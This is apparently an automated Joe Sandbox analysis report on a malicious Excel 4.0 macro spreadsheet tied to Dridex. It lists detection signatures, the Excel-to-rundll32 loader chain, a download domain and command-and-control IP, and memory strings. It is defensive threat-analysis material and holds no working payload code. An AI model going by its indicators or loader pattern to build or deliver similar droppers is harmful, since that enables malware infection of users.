Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Documents_460000622_1464906353.xls

Overview

General Information

Sample Name:Documents_460000622_1464906353.xls
Analysis ID:383422
MD5:bcd540201ec5e0301816d194bb15ec30
SHA1:e5ca3f6cbb69736c904ff77f7ab6514fc48153a3
SHA256:a83ce7af997c7514b9faa386fde353ce094e7ef5bfc31dfb52dc9f5d7cfee43e
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara detected Xls With Macro 4.0
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2004 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2536 cmdline: rundll32 ..\ndgfht.frg,PluginInit MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 1108 cmdline: rundll32 ..\ndgfht.frg,PluginInit MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • cmd.exe (PID: 3032 cmdline: C:\Windows\System32\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Documents_460000622_1464906353.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x165b8:$e1: Enable Editing
  • 0x16302:$e3: Enable editing
  • 0x163d4:$e4: Enable content
Documents_460000622_1464906353.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: rundll32.exe PID: 1108JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: unknownHTTPS traffic detected: 104.21.3.47:443 -> 192.168.2.22:49167 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.12.4.186:443 -> 192.168.2.22:49170 version: TLS 1.2
      Source: Binary string: wininet.pdb source: rundll32.exe, 00000004.00000003.2162769102.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: advapi32.pdb;Y source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
      Source: Binary string: wkernel32.pdb source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmp
      Source: Binary string: shlwapi.pdb source: rundll32.exe, 00000004.00000003.2166262652.0000000002531000.00000004.00000001.sdmp
      Source: Binary string: c:\over\sat\63_Safe\tra\fell\clear.pdb source: rundll32.exe, 00000004.00000002.2257199515.000000006E815000.00000002.00020000.sdmp, ndgfht.frg.0.dr
      Source: Binary string: shell32.pdb9 source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.2163524826.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: wuser32.pdb source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp
      Source: Binary string: ole32.pdb source: rundll32.exe, 00000004.00000003.2163347382.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: advapi32.pdb source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
      Source: Binary string: shell32.pdb source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: crypt32.pdb source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E77F61E FindFirstFileExW,4_2_6E77F61E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E802EC8 FindFirstFileExA,4_2_6E802EC8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E803336 FindFirstFileExA,4_2_6E803336
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E803361 FindFirstFileExW,4_2_6E803361

      Software Vulnerabilities:

      barindex
      Document exploit detected (creates forbidden files)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dllJump to behavior
      Document exploit detected (drops PE files)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: ohior[1].dll.0.drJump to dropped file
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
      Source: global trafficDNS query: name: whiskyexpanse.com
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.3.47:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.3.47:443

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 52.12.4.186:443 -> 192.168.2.22:49170
      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: Joe Sandbox ViewJA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: unknownTCP traffic detected without corresponding DNS query: 52.12.4.186
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\585D4361.emfJump to behavior
      Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
      Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
      Source: unknownDNS traffic detected: queries for: whiskyexpanse.com
      Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.1
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
      Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
      Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
      Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
      Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: rundll32.exe, 00000004.00000003.2170206106.0000000000335000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?f47754d4c3434
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
      Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
      Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
      Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
      Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
      Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
      Source: rundll32.exe, 00000004.00000002.2255083971.0000000002F10000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: rundll32.exe, 00000004.00000002.2255083971.0000000002F10000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at0E
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.crc.bg0
      Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca0f
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/net1.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.firmaprofesional.com0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0=
      Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
      Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: rundll32.exe, 00000004.00000003.2162769102.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.passport.com
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
